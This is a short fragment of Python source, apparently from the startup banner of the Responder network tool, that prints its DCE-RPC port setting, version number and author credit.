print(' %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))
#credits
print('')
print(color("[*] ", 2, 1)+"Version: "+settings.__version__)
print(color("[*] ", 2, 1)+"Author: Laurent Gaffie, <lgaffie@secorizon.com>")